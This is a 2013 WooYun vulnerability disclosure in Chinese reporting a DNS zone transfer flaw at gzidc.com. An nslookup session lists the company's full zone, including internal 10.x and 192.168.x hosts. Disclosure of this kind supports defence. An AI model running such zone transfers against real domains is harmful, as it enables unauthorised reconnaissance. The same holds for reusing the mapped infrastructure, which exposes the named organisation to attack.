漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039130
漏洞标题:四星运营商金万邦科技# DNS域传送漏洞一枚
相关厂商:新一代数据中心
漏洞作者: 爱上平顶山
提交时间:2013-10-09 11:20
修复时间:2013-11-23 11:21
公开时间:2013-11-23 11:21
漏洞类型:系统/服务运维配置不当
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
金万邦科技 DNS域传送漏洞
C:\Documents and Settings\Administrator>nslookup
Default Server: google-public-dns-a.google.com
Address: 8.8.8.8
> gzidc.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
Name: gzidc.com
Address: 211.147.245.88
> set type=ns
> gzidc.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
gzidc.com nameserver = ns.gzidc.com
gzidc.com nameserver = ns1.gzidc.com
> server ns.gzidc.com
Default Server: ns.gzidc.com
Address: 211.155.27.88
> ls gzidc.com
[ns.gzidc.com]
gzidc.com. NS server = ns.gzidc.com
gzidc.com. NS server = ns1.gzidc.com
gzidc.com. A 211.147.245.88
3lines A 211.147.235.76
ac A 218.30.103.207
agent A 211.147.246.8
arp A 10.10.1.105
cache A 211.147.249.199
cloud A 124.173.145.88
cloud A 211.147.245.88
cnc A 58.248.4.118
cs A 10.10.1.105
cservice A 211.147.246.10
ctc A 211.147.224.89
download A 211.155.23.29
faq A 124.172.244.102
help A 124.172.244.102
icann A 59.188.81.196
icp A 211.147.246.11
icpadmin A 211.147.246.11
icpmember A 211.147.246.11
info A 10.10.1.108
kefu A 10.10.1.105
mail A 211.155.27.23
mrtg A 192.168.100.45
mrtg2 A 192.168.100.21
mx1 A 211.147.224.89
mx2 A 211.147.224.88
new A 124.173.145.88
new A 211.147.245.88
ns A 211.155.27.88
ns1 A 124.172.251.8
ns2 A 61.144.40.68
ns3 A 124.173.145.90
ns3 A 124.173.145.91
ns4 A 124.173.65.90
ns4 A 124.173.65.91
ns5 A 61.144.40.92
ns5 A 61.144.40.93
ns5 A 124.173.65.29
ns5 A 124.173.65.30
ns6 A 124.172.157.92
ns6 A 124.172.157.93
ns6 A 124.173.65.92
ns6 A 124.173.65.93
ns7 A 124.173.145.25
ns8 A 124.172.157.88
old A 124.173.145.88
old A 211.147.245.88
ping A 211.155.23.29
rs A 124.173.144.198
store A 211.147.246.8
tech A 10.10.1.108
traffic A 211.147.235.73
traffic2 A 211.147.235.75
vps A 124.173.145.88
vps A 211.147.245.88
web A 211.147.246.8
wh A 124.172.129.131
whois A 211.147.246.8
wsus A 124.172.251.67
www A 124.173.145.88
www A 211.147.245.88
>
漏洞证明:
修复方案:
ok 补。
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝